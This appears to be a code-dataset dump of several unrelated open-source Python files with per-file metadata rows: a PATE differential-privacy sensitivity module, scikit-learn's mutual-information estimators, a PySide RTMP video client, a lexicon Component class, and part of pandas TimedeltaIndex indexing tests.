log1q = np.log1p(-math.exp(logq)) # log1q = log(1-q)
log_a = (order - 1) * (
log1q - (np.log1p(-math.exp((logq + eps2) * (1 - 1 / mu2)))))
log_b = (order - 1) * (eps1 - logq / (mu1 - 1))
return np.logaddexp(log1q + log_a, logq + log_b) / (order - 1)
def _compute_rdp_gnmax(sigma, logq, order):
logq0 = _compute_logq0(sigma, order)
if logq >= logq0:
return pate.rdp_data_independent_gaussian(sigma, order)
else:
return _compute_data_dep_bound_gnmax(sigma, logq, order)
def compute_logq0_gnmax(sigma, order):
"""Computes the point where we start using data-independent bounds.
Args:
sigma: std of the Gaussian noise
order: Renyi order lambda
Returns:
logq0: the point above which the data-ind bound overtakes data-dependent
bound.
"""
def _check_validity_conditions(logq):
# Function returns true iff logq is in the range where data-dependent bound
# is valid. (Theorem 6 in Appendix.)
mu1, mu2 = _compute_mu1_mu2_gnmax(sigma, logq)
if mu1 < order:
return False
eps2 = mu2 / sigma**2
# Do computation in the log space. The condition below comes from Lemma 9
# from Appendix.
return (logq <= (mu2 - 1) * eps2 - mu2 * math.log(mu1 / (mu1 - 1) * mu2 /
(mu2 - 1)))
def _compare_dep_vs_ind(logq):
return (_compute_data_dep_bound_gnmax(sigma, logq, order) -
pate.rdp_data_independent_gaussian(sigma, order))
# Natural upper bounds on q0.
logub = min(-(1 + 1. / sigma)**2, -((order - .99) / sigma)**2, -1 / sigma**2)
assert _check_validity_conditions(logub)
# If data-dependent bound is already better, we are done already.
if _compare_dep_vs_ind(logub) < 0:
return logub
# Identifying a reasonable lower bound to bracket logq0.
loglb = 2 * logub # logub is negative, and thus loglb < logub.
while _compare_dep_vs_ind(loglb) > 0:
assert loglb > -10000, "The lower bound on q0 is way too low."
loglb *= 1.5
logq0, r = scipy.optimize.brentq(
_compare_dep_vs_ind, loglb, logub, full_output=True)
assert r.converged, "The root finding procedure failed to converge."
assert _check_validity_conditions(logq0) # just in case.
return logq0
def _compute_bl_gnmax(q, sigma, num_classes):
return ((num_classes - 1) / 2 * scipy.special.erfc(
1 / sigma + scipy.special.erfcinv(2 * q / (num_classes - 1))))
def _compute_bu_gnmax(q, sigma, num_classes):
return min(1, (num_classes - 1) / 2 * scipy.special.erfc(
-1 / sigma + scipy.special.erfcinv(2 * q / (num_classes - 1))))
def _compute_local_sens_gnmax(logq, sigma, num_classes, order):
"""Implements Algorithm 3 (computes an upper bound on local sensitivity).
(See Proposition 13 for proof of correctness.)
"""
logq0 = _compute_logq0(sigma, order)
logq1 = _compute_logq1(sigma, order, num_classes)
if logq1 <= logq <= logq0:
logq = logq1
beta = _compute_rdp_gnmax(sigma, logq, order)
beta_bu_q = _compute_rdp_gnmax(
sigma, math.log(_compute_bu_gnmax(math.exp(logq), sigma, num_classes)),
order)
beta_bl_q = _compute_rdp_gnmax(
sigma, math.log(_compute_bl_gnmax(math.exp(logq), sigma, num_classes)),
order)
return max(beta_bu_q - beta, beta - beta_bl_q)
def compute_local_sensitivity_bounds_gnmax(votes, num_teachers, sigma, order):
"""Computes a list of max-LS-at-distance-d for the GNMax mechanism.
A more efficient implementation of Algorithms 4 and 5 working in time
O(teachers*classes). A naive implementation is O(teachers^2*classes) or worse.
Args:
votes: A numpy array of votes.
num_teachers: Total number of voting teachers.
sigma: Standard deviation of the Guassian noise.
order: The Renyi order.
Returns:
A numpy array of local sensitivities at distances d, 0 <= d <= num_teachers.
"""
num_classes = len(votes) # Called m in the paper.
logq0 = _compute_logq0(sigma, order)
logq1 = _compute_logq1(sigma, order, num_classes)
logq = pate.compute_logq_gaussian(votes, sigma)
plateau = _compute_local_sens_gnmax(logq1, sigma, num_classes, order)
res = np.full(num_teachers, plateau)
if logq1 <= logq <= logq0:
return res
# Invariant: votes is sorted in the non-increasing order.
votes = sorted(votes, reverse=True)
res[0] = _compute_local_sens_gnmax(logq, sigma, num_classes, order)
curr_d = 0
go_left = logq > logq0 # Otherwise logq < logq1 and we go right.
# Iterate while the following is true:
# 1. If we are going left, logq is still larger than logq0 and we may still
# increase the gap between votes[0] and votes[1].
# 2. If we are going right, logq is still smaller than logq1.
while ((go_left and logq > logq0 and votes[1] > 0) or
(not go_left and logq < logq1)):
curr_d += 1
if go_left: # Try decreasing logq.
votes[0] += 1
votes[1] -= 1
idx = 1
# Restore the invariant. (Can be implemented more efficiently by keeping
# track of the range of indices equal to votes[1]. Does not seem to matter
# for the overall running time.)
while idx < len(votes) - 1 and votes[idx] < votes[idx + 1]:
votes[idx], votes[idx + 1] = votes[idx + 1], votes[idx]
idx += 1
else: # Go right, i.e., try increasing logq.
votes[0] -= 1
votes[1] += 1 # The invariant holds since otherwise logq >= logq1.
logq = pate.compute_logq_gaussian(votes, sigma)
res[curr_d] = _compute_local_sens_gnmax(logq, sigma, num_classes, order)
return res
##################################################
# SMOOTH SENSITIVITY FOR THE THRESHOLD MECHANISM #
##################################################
# A global dictionary of RDPs for various threshold values. Indexed by a 4-tuple
# (num_teachers, threshold, sigma, order).
_rdp_thresholds = {}
def _compute_rdp_list_threshold(num_teachers, threshold, sigma, order):
key = (num_teachers, threshold, sigma, order)
if key in _rdp_thresholds:
return _rdp_thresholds[key]
res = np.zeros(num_teachers + 1)
for v in range(0, num_teachers + 1):
logp = scipy.stats.norm.logsf(threshold - v, scale=sigma)
res[v] = pate.compute_rdp_threshold(logp, sigma, order)
_rdp_thresholds[key] = res
return res
def compute_local_sensitivity_bounds_threshold(counts, num_teachers, threshold,
sigma, order):
"""Computes a list of max-LS-at-distance-d for the threshold mechanism."""
def _compute_ls(v):
ls_step_up, ls_step_down = None, None
if v > 0:
ls_step_down = abs(rdp_list[v - 1] - rdp_list[v])
if v < num_teachers:
ls_step_up = abs(rdp_list[v + 1] - rdp_list[v])
return max(ls_step_down, ls_step_up) # Rely on max(x, None) = x.
cur_max = int(round(max(counts)))
rdp_list = _compute_rdp_list_threshold(num_teachers, threshold, sigma, order)
ls = np.zeros(num_teachers)
for d in range(max(cur_max, num_teachers - cur_max)):
ls_up, ls_down = None, None
if cur_max + d <= num_teachers:
ls_up = _compute_ls(cur_max + d)
if cur_max - d >= 0:
ls_down = _compute_ls(cur_max - d)
ls[d] = max(ls_up, ls_down)
return ls
#############################################
# PROCEDURES FOR SMOOTH SENSITIVITY RELEASE #
#############################################
# A global dictionary of exponentially decaying arrays. Indexed by beta.
dict_beta_discount = {}
def compute_discounted_max(beta, a):
n = len(a)
if beta not in dict_beta_discount or (len(dict_beta_discount[beta]) < n):
dict_beta_discount[beta] = np.exp(-beta * np.arange(n))
return max(a * dict_beta_discount[beta][:n])
def compute_smooth_sensitivity_gnmax(beta, counts, num_teachers, sigma, order):
"""Computes smooth sensitivity of a single application of GNMax."""
ls = compute_local_sensitivity_bounds_gnmax(counts, sigma, order,
num_teachers)
return compute_discounted_max(beta, ls)
def compute_rdp_of_smooth_sensitivity_gaussian(beta, sigma, order):
"""Computes the RDP curve for the GNSS mechanism.
Implements Theorem 23 (https://arxiv.org/pdf/1802.08908.pdf).
"""
if beta > 0 and not 1 < order < 1 / (2 * beta):
raise ValueError("Order outside the (1, 1/(2*beta)) range.")
return order * math.exp(2 * beta) / sigma**2 + (
-.5 * math.log(1 - 2 * order * beta) + beta * order) / (
order - 1)
def compute_params_for_ss_release(eps, delta):
"""Computes sigma for additive Gaussian noise scaled by smooth sensitivity.
Presently not used. (We proceed via RDP analysis.)
Compute beta, sigma for applying Lemma 2.6 (full version of Nissim et al.) via
Lemma 2.10.
"""
# Rather than applying Lemma 2.10 directly, which would give suboptimal alpha,
# (see http://www.cse.psu.edu/~ads22/pubs/NRS07/NRS07-full-draft-v1.pdf),
# we extract a sufficient condition on alpha from its proof.
#
# Let a = rho_(delta/2)(Z_1). Then solve for alpha such that
# 2 alpha a + alpha^2 = eps/2.
a = scipy.special.ndtri(1 - delta / 2)
alpha = math.sqrt(a**2 + eps / 2) - a
beta = eps / (2 * scipy.special.chdtri(1, delta / 2))
return alpha, beta
#######################################################
# SYMBOLIC-NUMERIC VERIFICATION OF CONDITIONS C5--C6. #
#######################################################
def _construct_symbolic_beta(q, sigma, order):
mu2 = sigma * sp.sqrt(sp.log(1 / q))
mu1 = mu2 + 1
eps1 = mu1 / sigma**2
eps2 = mu2 / sigma**2
a = (1 - q) / (1 - (q * sp.exp(eps2))**(1 - 1 / mu2))
b = sp.exp(eps1) / q**(1 / (mu1 - 1))
s = (1 - q) * a**(order - 1) + q * b**(order - 1)
return (1 / (order - 1)) * sp.log(s)
def _construct_symbolic_bu(q, sigma, m):
return (m - 1) / 2 * sp.erfc(sp.erfcinv(2 * q / (m - 1)) - 1 / sigma)
def _is_non_decreasing(fn, q, bounds):
"""Verifies whether the function is non-decreasing within a range.
Args:
fn: Symbolic function of a single variable.
q: The name of f's variable.
bounds: Pair of (lower_bound, upper_bound) reals.
Returns:
True iff the function is non-decreasing in the range.
"""
diff_fn = sp.diff(fn, q) # Symbolically compute the derivative.
diff_fn_lambdified = sp.lambdify(
q,
diff_fn,
modules=[
"numpy", {
"erfc": scipy.special.erfc,
"erfcinv": scipy.special.erfcinv
}
])
r = scipy.optimize.minimize_scalar(
diff_fn_lambdified, bounds=bounds, method="bounded")
assert r.success, "Minimizer failed to converge."
return r.fun >= 0 # Check whether the derivative is non-negative.
def check_conditions(sigma, m, order):
"""Checks conditions C5 and C6 (Section B.4.2 in Appendix)."""
q = sp.symbols("q", positive=True, real=True)
beta = _construct_symbolic_beta(q, sigma, order)
q0 = math.exp(compute_logq0_gnmax(sigma, order))
cond5 = _is_non_decreasing(beta, q, (0, q0))
if cond5:
bl_q0 = _compute_bl_gnmax(q0, sigma, m)
bu = _construct_symbolic_bu(q, sigma, m)
delta_beta = beta.subs(q, bu) - beta
cond6 = _is_non_decreasing(delta_beta, q, (0, bl_q0))
else:
cond6 = False # Skip the check, since Condition 5 is false already.
return (cond5, cond6)
def main(argv):
del argv # Unused.
if __name__ == "__main__":
app.run(main)
|
apache-2.0
| -4,641,048,824,878,597,000
| 31.789976
| 87
| 0.635126
| false
| 3.116126
| false
| false
| false
|
kevin-intel/scikit-learn
|
sklearn/feature_selection/_mutual_info.py
|
3
|
16639
|
# Author: Nikolay Mayorov <n59_ru@hotmail.com>
# License: 3-clause BSD
import numpy as np
from scipy.sparse import issparse
from scipy.special import digamma
from ..metrics.cluster import mutual_info_score
from ..neighbors import NearestNeighbors, KDTree
from ..preprocessing import scale
from ..utils import check_random_state
from ..utils.fixes import _astype_copy_false
from ..utils.validation import check_array, check_X_y
from ..utils.multiclass import check_classification_targets
def _compute_mi_cc(x, y, n_neighbors):
"""Compute mutual information between two continuous variables.
Parameters
----------
x, y : ndarray, shape (n_samples,)
Samples of two continuous random variables, must have an identical
shape.
n_neighbors : int
Number of nearest neighbors to search for each point, see [1]_.
Returns
-------
mi : float
Estimated mutual information. If it turned out to be negative it is
replace by 0.
Notes
-----
True mutual information can't be negative. If its estimate by a numerical
method is negative, it means (providing the method is adequate) that the
mutual information is close to 0 and replacing it by 0 is a reasonable
strategy.
References
----------
.. [1] A. Kraskov, H. Stogbauer and P. Grassberger, "Estimating mutual
information". Phys. Rev. E 69, 2004.
"""
n_samples = x.size
x = x.reshape((-1, 1))
y = y.reshape((-1, 1))
xy = np.hstack((x, y))
# Here we rely on NearestNeighbors to select the fastest algorithm.
nn = NearestNeighbors(metric='chebyshev', n_neighbors=n_neighbors)
nn.fit(xy)
radius = nn.kneighbors()[0]
radius = np.nextafter(radius[:, -1], 0)
# KDTree is explicitly fit to allow for the querying of number of
# neighbors within a specified radius
kd = KDTree(x, metric='chebyshev')
nx = kd.query_radius(x, radius, count_only=True, return_distance=False)
nx = np.array(nx) - 1.0
kd = KDTree(y, metric='chebyshev')
ny = kd.query_radius(y, radius, count_only=True, return_distance=False)
ny = np.array(ny) - 1.0
mi = (digamma(n_samples) + digamma(n_neighbors) -
np.mean(digamma(nx + 1)) - np.mean(digamma(ny + 1)))
return max(0, mi)
def _compute_mi_cd(c, d, n_neighbors):
"""Compute mutual information between continuous and discrete variables.
Parameters
----------
c : ndarray, shape (n_samples,)
Samples of a continuous random variable.
d : ndarray, shape (n_samples,)
Samples of a discrete random variable.
n_neighbors : int
Number of nearest neighbors to search for each point, see [1]_.
Returns
-------
mi : float
Estimated mutual information. If it turned out to be negative it is
replace by 0.
Notes
-----
True mutual information can't be negative. If its estimate by a numerical
method is negative, it means (providing the method is adequate) that the
mutual information is close to 0 and replacing it by 0 is a reasonable
strategy.
References
----------
.. [1] B. C. Ross "Mutual Information between Discrete and Continuous
Data Sets". PLoS ONE 9(2), 2014.
"""
n_samples = c.shape[0]
c = c.reshape((-1, 1))
radius = np.empty(n_samples)
label_counts = np.empty(n_samples)
k_all = np.empty(n_samples)
nn = NearestNeighbors()
for label in np.unique(d):
mask = d == label
count = np.sum(mask)
if count > 1:
k = min(n_neighbors, count - 1)
nn.set_params(n_neighbors=k)
nn.fit(c[mask])
r = nn.kneighbors()[0]
radius[mask] = np.nextafter(r[:, -1], 0)
k_all[mask] = k
label_counts[mask] = count
# Ignore points with unique labels.
mask = label_counts > 1
n_samples = np.sum(mask)
label_counts = label_counts[mask]
k_all = k_all[mask]
c = c[mask]
radius = radius[mask]
kd = KDTree(c)
m_all = kd.query_radius(c, radius, count_only=True, return_distance=False)
m_all = np.array(m_all) - 1.0
mi = (digamma(n_samples) + np.mean(digamma(k_all)) -
np.mean(digamma(label_counts)) -
np.mean(digamma(m_all + 1)))
return max(0, mi)
def _compute_mi(x, y, x_discrete, y_discrete, n_neighbors=3):
"""Compute mutual information between two variables.
This is a simple wrapper which selects a proper function to call based on
whether `x` and `y` are discrete or not.
"""
if x_discrete and y_discrete:
return mutual_info_score(x, y)
elif x_discrete and not y_discrete:
return _compute_mi_cd(y, x, n_neighbors)
elif not x_discrete and y_discrete:
return _compute_mi_cd(x, y, n_neighbors)
else:
return _compute_mi_cc(x, y, n_neighbors)
def _iterate_columns(X, columns=None):
"""Iterate over columns of a matrix.
Parameters
----------
X : ndarray or csc_matrix, shape (n_samples, n_features)
Matrix over which to iterate.
columns : iterable or None, default=None
Indices of columns to iterate over. If None, iterate over all columns.
Yields
------
x : ndarray, shape (n_samples,)
Columns of `X` in dense format.
"""
if columns is None:
columns = range(X.shape[1])
if issparse(X):
for i in columns:
x = np.zeros(X.shape[0])
start_ptr, end_ptr = X.indptr[i], X.indptr[i + 1]
x[X.indices[start_ptr:end_ptr]] = X.data[start_ptr:end_ptr]
yield x
else:
for i in columns:
yield X[:, i]
def _estimate_mi(X, y, discrete_features='auto', discrete_target=False,
n_neighbors=3, copy=True, random_state=None):
"""Estimate mutual information between the features and the target.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Feature matrix.
y : array-like of shape (n_samples,)
Target vector.
discrete_features : {'auto', bool, array-like}, default='auto'
If bool, then determines whether to consider all features discrete
or continuous. If array, then it should be either a boolean mask
with shape (n_features,) or array with indices of discrete features.
If 'auto', it is assigned to False for dense `X` and to True for
sparse `X`.
discrete_target : bool, default=False
Whether to consider `y` as a discrete variable.
n_neighbors : int, default=3
Number of neighbors to use for MI estimation for continuous variables,
see [1]_ and [2]_. Higher values reduce variance of the estimation, but
could introduce a bias.
copy : bool, default=True
Whether to make a copy of the given data. If set to False, the initial
data will be overwritten.
random_state : int, RandomState instance or None, default=None
Determines random number generation for adding small noise to
continuous variables in order to remove repeated values.
Pass an int for reproducible results across multiple function calls.
See :term:`Glossary <random_state>`.
Returns
-------
mi : ndarray, shape (n_features,)
Estimated mutual information between each feature and the target.
A negative value will be replaced by 0.
References
----------
.. [1] A. Kraskov, H. Stogbauer and P. Grassberger, "Estimating mutual
information". Phys. Rev. E 69, 2004.
.. [2] B. C. Ross "Mutual Information between Discrete and Continuous
Data Sets". PLoS ONE 9(2), 2014.
"""
X, y = check_X_y(X, y, accept_sparse='csc', y_numeric=not discrete_target)
n_samples, n_features = X.shape
if isinstance(discrete_features, (str, bool)):
if isinstance(discrete_features, str):
if discrete_features == 'auto':
discrete_features = issparse(X)
else:
raise ValueError("Invalid string value for discrete_features.")
discrete_mask = np.empty(n_features, dtype=bool)
discrete_mask.fill(discrete_features)
else:
discrete_features = check_array(discrete_features, ensure_2d=False)
if discrete_features.dtype != 'bool':
discrete_mask = np.zeros(n_features, dtype=bool)
discrete_mask[discrete_features] = True
else:
discrete_mask = discrete_features
continuous_mask = ~discrete_mask
if np.any(continuous_mask) and issparse(X):
raise ValueError("Sparse matrix `X` can't have continuous features.")
rng = check_random_state(random_state)
if np.any(continuous_mask):
if copy:
X = X.copy()
if not discrete_target:
X[:, continuous_mask] = scale(X[:, continuous_mask],
with_mean=False, copy=False)
# Add small noise to continuous features as advised in Kraskov et. al.
X = X.astype(float, **_astype_copy_false(X))
means = np.maximum(1, np.mean(np.abs(X[:, continuous_mask]), axis=0))
X[:, continuous_mask] += 1e-10 * means * rng.randn(
n_samples, np.sum(continuous_mask))
if not discrete_target:
y = scale(y, with_mean=False)
y += 1e-10 * np.maximum(1, np.mean(np.abs(y))) * rng.randn(n_samples)
mi = [_compute_mi(x, y, discrete_feature, discrete_target, n_neighbors) for
x, discrete_feature in zip(_iterate_columns(X), discrete_mask)]
return np.array(mi)
def mutual_info_regression(X, y, *, discrete_features='auto', n_neighbors=3,
copy=True, random_state=None):
"""Estimate mutual information for a continuous target variable.
Mutual information (MI) [1]_ between two random variables is a non-negative
value, which measures the dependency between the variables. It is equal
to zero if and only if two random variables are independent, and higher
values mean higher dependency.
The function relies on nonparametric methods based on entropy estimation
from k-nearest neighbors distances as described in [2]_ and [3]_. Both
methods are based on the idea originally proposed in [4]_.
It can be used for univariate features selection, read more in the
:ref:`User Guide <univariate_feature_selection>`.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Feature matrix.
y : array-like of shape (n_samples,)
Target vector.
discrete_features : {'auto', bool, array-like}, default='auto'
If bool, then determines whether to consider all features discrete
or continuous. If array, then it should be either a boolean mask
with shape (n_features,) or array with indices of discrete features.
If 'auto', it is assigned to False for dense `X` and to True for
sparse `X`.
n_neighbors : int, default=3
Number of neighbors to use for MI estimation for continuous variables,
see [2]_ and [3]_. Higher values reduce variance of the estimation, but
could introduce a bias.
copy : bool, default=True
Whether to make a copy of the given data. If set to False, the initial
data will be overwritten.
random_state : int, RandomState instance or None, default=None
Determines random number generation for adding small noise to
continuous variables in order to remove repeated values.
Pass an int for reproducible results across multiple function calls.
See :term:`Glossary <random_state>`.
Returns
-------
mi : ndarray, shape (n_features,)
Estimated mutual information between each feature and the target.
Notes
-----
1. The term "discrete features" is used instead of naming them
"categorical", because it describes the essence more accurately.
For example, pixel intensities of an image are discrete features
(but hardly categorical) and you will get better results if mark them
as such. Also note, that treating a continuous variable as discrete and
vice versa will usually give incorrect results, so be attentive about
that.
2. True mutual information can't be negative. If its estimate turns out
to be negative, it is replaced by zero.
References
----------
.. [1] `Mutual Information
<https://en.wikipedia.org/wiki/Mutual_information>`_
on Wikipedia.
.. [2] A. Kraskov, H. Stogbauer and P. Grassberger, "Estimating mutual
information". Phys. Rev. E 69, 2004.
.. [3] B. C. Ross "Mutual Information between Discrete and Continuous
Data Sets". PLoS ONE 9(2), 2014.
.. [4] L. F. Kozachenko, N. N. Leonenko, "Sample Estimate of the Entropy
of a Random Vector", Probl. Peredachi Inf., 23:2 (1987), 9-16
"""
return _estimate_mi(X, y, discrete_features, False, n_neighbors,
copy, random_state)
def mutual_info_classif(X, y, *, discrete_features='auto', n_neighbors=3,
copy=True, random_state=None):
"""Estimate mutual information for a discrete target variable.
Mutual information (MI) [1]_ between two random variables is a non-negative
value, which measures the dependency between the variables. It is equal
to zero if and only if two random variables are independent, and higher
values mean higher dependency.
The function relies on nonparametric methods based on entropy estimation
from k-nearest neighbors distances as described in [2]_ and [3]_. Both
methods are based on the idea originally proposed in [4]_.
It can be used for univariate features selection, read more in the
:ref:`User Guide <univariate_feature_selection>`.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Feature matrix.
y : array-like of shape (n_samples,)
Target vector.
discrete_features : {'auto', bool, array-like}, default='auto'
If bool, then determines whether to consider all features discrete
or continuous. If array, then it should be either a boolean mask
with shape (n_features,) or array with indices of discrete features.
If 'auto', it is assigned to False for dense `X` and to True for
sparse `X`.
n_neighbors : int, default=3
Number of neighbors to use for MI estimation for continuous variables,
see [2]_ and [3]_. Higher values reduce variance of the estimation, but
could introduce a bias.
copy : bool, default=True
Whether to make a copy of the given data. If set to False, the initial
data will be overwritten.
random_state : int, RandomState instance or None, default=None
Determines random number generation for adding small noise to
continuous variables in order to remove repeated values.
Pass an int for reproducible results across multiple function calls.
See :term:`Glossary <random_state>`.
Returns
-------
mi : ndarray, shape (n_features,)
Estimated mutual information between each feature and the target.
Notes
-----
1. The term "discrete features" is used instead of naming them
"categorical", because it describes the essence more accurately.
For example, pixel intensities of an image are discrete features
(but hardly categorical) and you will get better results if mark them
as such. Also note, that treating a continuous variable as discrete and
vice versa will usually give incorrect results, so be attentive about
that.
2. True mutual information can't be negative. If its estimate turns out
to be negative, it is replaced by zero.
References
----------
.. [1] `Mutual Information
<https://en.wikipedia.org/wiki/Mutual_information>`_
on Wikipedia.
.. [2] A. Kraskov, H. Stogbauer and P. Grassberger, "Estimating mutual
information". Phys. Rev. E 69, 2004.
.. [3] B. C. Ross "Mutual Information between Discrete and Continuous
Data Sets". PLoS ONE 9(2), 2014.
.. [4] L. F. Kozachenko, N. N. Leonenko, "Sample Estimate of the Entropy
of a Random Vector:, Probl. Peredachi Inf., 23:2 (1987), 9-16
"""
check_classification_targets(y)
return _estimate_mi(X, y, discrete_features, True, n_neighbors,
copy, random_state)
|
bsd-3-clause
| -3,846,150,620,233,349,600
| 36.307175
| 79
| 0.640603
| false
| 3.913217
| false
| false
| false
|
Ingener74/Old-Star
|
video.py
|
1
|
1386
|
# encoding: utf8
from PySide.QtCore import Qt, QThread
from PySide.QtGui import QWidget, QApplication
import sys
from librtmp import RTMP, RTMPError
from res import (Ui_VideoWidget)
class StreamThread(QThread):
def __init__(self):
QThread.__init__(self)
def run(self):
try:
rtmp = RTMP(url='rtmp://127.0.0.1:1935/live/test')
print '1'
print rtmp
print '2'
print rtmp.connect()
print '3'
pkt = rtmp.read_packet()
print '4'
print pkt
print '5'
stream = rtmp.create_stream()
print '6'
print stream
# data = stream.read(1024)
except RTMPError, e:
print e
class Video(QWidget, Ui_VideoWidget):
def __init__(self, parent=None):
QWidget.__init__(self, parent)
self.setupUi(self)
self.controlButton.clicked.connect(self.onControlButton)
def onControlButton(self):
self.streamThread = StreamThread()
self.streamThread.start()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Escape:
self.close()
if __name__ == '__main__':
# noinspection PyCallByClass
QApplication.setStyle("plastique")
app = QApplication(sys.argv)
video = Video()
video.show()
sys.exit(app.exec_())
|
lgpl-3.0
| 8,452,937,607,431,824,000
| 20.323077
| 64
| 0.560606
| false
| 3.79726
| false
| false
| false
|
buret/pylmflib
|
pylmflib/morphology/component.py
|
1
|
1531
|
#! /usr/bin/env python
"""! @package morphology
"""
class Component():
def __init__(self, position=None, lexeme=None):
"""! @brief Constructor.
Component instances are owned by ListOfComponents.
@param position The position of the component in the multiword expression.
@param targets Related lexeme.
@return A Component instance.
"""
self.position = position
# Composed LexicalEntry lexeme
self.targets = lexeme
## Pointer to an existing LexicalEntry
# There is one LexicalEntry pointer by Component instance
self.__lexical_entry = None
def __del__(self):
"""! @brief Destructor.
"""
# Decrement the reference count on pointed objects
self.__lexical_entry = None
def set_lexical_entry(self, lexical_entry):
"""! @brief Set pointer to the component lexical entry instance. This function can only be called once the full dictionary has been parsed.
@param lexical_entry The component LexicalEntry.
@return Component instance.
"""
self.__lexical_entry = lexical_entry
return self
def get_lexical_entry(self):
"""! @brief Get pointed lexical entry.
@return Component private attribute '__lexical_entry'.
"""
return self.__lexical_entry
def get_lexeme(self):
"""! @brief Get component LexicalEntry lexeme.
@return Component attribute 'targets'.
"""
return self.targets
|
gpl-2.0
| -6,142,575,380,407,489,000
| 33.022222
| 147
| 0.625735
| false
| 4.349432
| false
| false
| false
|
cbertinato/pandas
|
pandas/tests/indexes/timedeltas/test_indexing.py
|
1
|
13473
|
from datetime import datetime, timedelta
import numpy as np
import pytest
import pandas as pd
from pandas import Index, Timedelta, TimedeltaIndex, timedelta_range
import pandas.util.testing as tm
class TestGetItem:
def test_ellipsis(self):
# GH#21282
idx = timedelta_range('1 day', '31 day', freq='D', name='idx')
result = idx[...]
assert result.equals(idx)
assert result is not idx
def test_getitem(self):
idx1 = timedelta_range('1 day', '31 day', freq='D', name='idx')
for idx in [idx1]:
result = idx[0]
assert result == Timedelta('1 day')
result = idx[0:5]
expected = timedelta_range('1 day', '5 day', freq='D',
name='idx')
tm.assert_index_equal(result, expected)
assert result.freq == expected.freq
result = idx[0:10:2]
expected = timedelta_range('1 day', '9 day', freq='2D',
name='idx')
tm.assert_index_equal(result, expected)
assert result.freq == expected.freq
result = idx[-20:-5:3]
expected = timedelta_range('12 day', '24 day', freq='3D',
name='idx')
tm.assert_index_equal(result, expected)
assert result.freq == expected.freq
result = idx[4::-1]
expected = TimedeltaIndex(['5 day', '4 day', '3 day',
'2 day', '1 day'],
freq='-1D', name='idx')
tm.assert_index_equal(result, expected)
assert result.freq == expected.freq
@pytest.mark.parametrize('key', [pd.Timestamp('1970-01-01'),
pd.Timestamp('1970-01-02'),
datetime(1970, 1, 1)])
def test_timestamp_invalid_key(self, key):
# GH#20464
tdi = pd.timedelta_range(0, periods=10)
with pytest.raises(TypeError):
tdi.get_loc(key)
class TestWhere:
# placeholder for symmetry with DatetimeIndex and PeriodIndex tests
pass
class TestTake:
def test_take(self):
# GH 10295
idx1 = timedelta_range('1 day', '31 day', freq='D', name='idx')
for idx in [idx1]:
result = idx.take([0])
assert result == Timedelta('1 day')
result = idx.take([-1])
assert result == Timedelta('31 day')
result = idx.take([0, 1, 2])
expected = timedelta_range('1 day', '3 day', freq='D',
name='idx')
tm.assert_index_equal(result, expected)
assert result.freq == expected.freq
result = idx.take([0, 2, 4])
expected = timedelta_range('1 day', '5 day', freq='2D',
name='idx')
tm.assert_index_equal(result, expected)
assert result.freq == expected.freq
result = idx.take([7, 4, 1])
expected = timedelta_range('8 day', '2 day', freq='-3D',
name='idx')
tm.assert_index_equal(result, expected)
assert result.freq == expected.freq
result = idx.take([3, 2, 5])
expected = TimedeltaIndex(['4 day', '3 day', '6 day'], name='idx')
tm.assert_index_equal(result, expected)
assert result.freq is None
result = idx.take([-3, 2, 5])
expected = TimedeltaIndex(['29 day', '3 day', '6 day'], name='idx')
tm.assert_index_equal(result, expected)
assert result.freq is None
def test_take_invalid_kwargs(self):
idx = timedelta_range('1 day', '31 day', freq='D', name='idx')
indices = [1, 6, 5, 9, 10, 13, 15, 3]
msg = r"take\(\) got an unexpected keyword argument 'foo'"
with pytest.raises(TypeError, match=msg):
idx.take(indices, foo=2)
msg = "the 'out' parameter is not supported"
with pytest.raises(ValueError, match=msg):
idx.take(indices, out=indices)
msg = "the 'mode' parameter is not supported"
with pytest.raises(ValueError, match=msg):
idx.take(indices, mode='clip')
# TODO: This method came from test_timedelta; de-dup with version above
def test_take2(self):
tds = ['1day 02:00:00', '1 day 04:00:00', '1 day 10:00:00']
idx = timedelta_range(start='1d', end='2d', freq='H', name='idx')
expected = TimedeltaIndex(tds, freq=None, name='idx')
taken1 = idx.take([2, 4, 10])
taken2 = idx[[2, 4, 10]]
for taken in [taken1, taken2]:
tm.assert_index_equal(taken, expected)
assert isinstance(taken, TimedeltaIndex)
assert taken.freq is None
assert taken.name == expected.name
def test_take_fill_value(self):
# GH 12631
idx = TimedeltaIndex(['1 days', '2 days', '3 days'],
name='xxx')
result = idx.take(np.array([1, 0, -1]))
expected = TimedeltaIndex(['2 days', '1 days', '3 days'],
name='xxx')
tm.assert_index_equal(result, expected)
# fill_value
result = idx.take(np.array([1, 0, -1]), fill_value=True)
expected = TimedeltaIndex(['2 days', '1 days', 'NaT'],
name='xxx')
tm.assert_index_equal(result, expected)
# allow_fill=False
result = idx.take(np.array([1, 0, -1]), allow_fill=False,
fill_value=True)
expected = TimedeltaIndex(['2 days', '1 days', '3 days'],
name='xxx')
tm.assert_index_equal(result, expected)
msg = ('When allow_fill=True and fill_value is not None, '
'all indices must be >= -1')
with pytest.raises(ValueError, match=msg):
idx.take(np.array([1, 0, -2]), fill_value=True)
with pytest.raises(ValueError, match=msg):
idx.take(np.array([1, 0, -5]), fill_value=True)
with pytest.raises(IndexError):
idx.take(np.array([1, -5]))
class TestTimedeltaIndex:
def test_insert(self):
idx = TimedeltaIndex(['4day', '1day', '2day'], name='idx')
result = idx.insert(2, timedelta(days=5))
exp = TimedeltaIndex(['4day', '1day', '5day', '2day'], name='idx')
tm.assert_index_equal(result, exp)
# insertion of non-datetime should coerce to object index
result = idx.insert(1, 'inserted')
expected = Index([Timedelta('4day'), 'inserted', Timedelta('1day'),
Timedelta('2day')], name='idx')
assert not isinstance(result, TimedeltaIndex)
tm.assert_index_equal(result, expected)
assert result.name == expected.name
idx = timedelta_range('1day 00:00:01', periods=3, freq='s', name='idx')
# preserve freq
expected_0 = TimedeltaIndex(['1day', '1day 00:00:01', '1day 00:00:02',
'1day 00:00:03'],
name='idx', freq='s')
expected_3 = TimedeltaIndex(['1day 00:00:01', '1day 00:00:02',
'1day 00:00:03', '1day 00:00:04'],
name='idx', freq='s')
# reset freq to None
expected_1_nofreq = TimedeltaIndex(['1day 00:00:01', '1day 00:00:01',
'1day 00:00:02', '1day 00:00:03'],
name='idx', freq=None)
expected_3_nofreq = TimedeltaIndex(['1day 00:00:01', '1day 00:00:02',
